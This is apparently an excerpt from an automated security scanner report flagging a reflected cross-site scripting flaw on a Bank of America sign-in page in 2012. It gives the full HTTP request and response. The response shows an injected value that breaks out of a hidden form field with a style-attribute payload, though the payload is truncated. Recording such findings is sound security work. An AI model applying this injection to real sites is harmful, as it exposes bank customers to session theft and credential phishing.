1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | https://safe.bankofa |
Path: | /login/sign-in/signO |
GET /login/sign-in/signO Host: safe.bankofamerica.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Connection: keep-alive Referer: http://www.bankofamerica Cookie: TLTUID=B9472E6EDF421 |
HTTP/1.1 200 OK Date: Sun, 05 Aug 2012 23:18:01 GMT Server: IBM_HTTP_Server P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Cache-Control: no-cache="set-cookie,set X-FRAME-OPTIONS: DENY Cache-Control: no-cache Set-Cookie: JS_VIPAA=0000b5E3lyN Set-Cookie: SMSESSION=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Domain=.bankofamerica.com Set-Cookie: cpk=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Domain=.bankofamerica.com Set-Cookie: cpk2=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Domain=.bankofamerica.com Set-Cookie: PI=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Domain=.bankofamerica.com Set-Cookie: pm_command=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Domain=.bankofamerica.com Via: On-Demand Router/1.0 Vary: Accept-Encoding Keep-Alive: timeout=5, max=481 Connection: Keep-Alive Content-Type: text/html;charset=ISO Content-Language: en-US X-Serviced-By: ukxmgGJ5xEb0bLGPHfz77A== Content-Length: 14873 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="state" value="DEbbd83"style="behavior:url ...[SNIP]... |